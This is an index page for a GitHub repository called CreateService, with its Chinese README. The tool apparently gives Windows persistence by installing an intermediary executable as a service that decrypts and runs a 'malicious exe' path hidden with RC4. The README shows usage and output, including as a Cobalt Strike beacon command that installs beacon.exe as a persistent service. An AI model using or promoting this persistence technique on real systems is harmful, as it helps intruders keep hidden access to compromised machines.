Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/uknowsec/CreateService
创建服务持久化
https://github.com/uknowsec/CreateService
Last synced: 21 days ago
JSON representation
创建服务持久化
- Host: GitHub
- URL: https://github.com/uknowsec/CreateService
- Owner: uknowsec
- Created: 2020-09-23T05:03:52.000Z (about 4 years ago)
- Default Branch: master
- Last Pushed: 2021-04-26T06:43:12.000Z (over 3 years ago)
- Last Synced: 2024-11-13T08:11:30.717Z (29 days ago)
- Language: C++
- Homepage:
- Size: 436 KB
- Stars: 104
- Watchers: 3
- Forks: 27
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - uknowsec/CreateService - 创建服务持久化 (C++)
README
# CreateService
## 文件说明
- CreateService : 创建服务与删除服务主程序
- CreateServiceDll : 创建服务与删除服务rdi
- TransitEXE :媒介程序
```
C:\Users\Administrator\Desktop>CreateService.exe "C:\Users\Administrator\Desktop\TransitEXE.exe" "C:\Users\Administrator\Desktop\test.exe" test start
[*] CreateService by Uknow
[+] ServiceName: test
[+] TransitPathName: C:\Users\Administrator\Desktop\TransitEXE.exe
[+] EvilPathName: C:\Users\Administrator\Desktop\test.exe
[+] Success! Service successfully Create and Start.
```
程序将TransitEXE.exe创建为服务,并将路径`C:\Users\Administrator\Desktop\test.exe`进行rc4加密(密钥为当前计算机的环境变量PROCESSOR_REVISION)写入`C:\Users\Administrator\Desktop\TransitEXE.exe`的资源文件中。
服务创建成功后,TransitEXE.exe从自身的资源中解密获取到恶意exe的路径并运行。
这样就只需要提供恶意exe即可,免除临时编译服务模块代码。
## Cobalt Strike RDI
```
beacon> CreateService C:\Users\Administrator\Desktop\TransitEXE.exe C:\Users\Administrator\Desktop\beacon.exe test start
[*] Tasked beacon to spawn CreateService ....
[+] arguments are:C:\Users\Administrator\Desktop\TransitEXE.exe C:\Users\Administrator\Desktop\beacon.exe test start
[+] host called home, sent: 103053 bytes
[+] received output:
[*] CreateService by Uknow
[+] ServiceName: test
[+] TransitPathName: C:\Users\Administrator\Desktop\TransitEXE.exe
[+] EvilPathName: C:\Users\Administrator\Desktop\beacon.exe
[+] Success! Service successfully Create and Start.
beacon> CreateService C:\Users\Administrator\Desktop\TransitEXE.exe C:\Users\Administrator\Desktop\beacon.exe test stop
[*] Tasked beacon to spawn CreateService ....
[+] arguments are:C:\Users\Administrator\Desktop\TransitEXE.exe C:\Users\Administrator\Desktop\beacon.exe test stop
[+] host called home, sent: 103052 bytes
[+] received output:
[*] CreateService by Uknow
[+] ServiceName: test
[+] TransitPathName: C:\Users\Administrator\Desktop\TransitEXE.exe
[+] EvilPathName: C:\Users\Administrator\Desktop\beacon.exe
[+] Success! Service successfully Stop and Delete.
```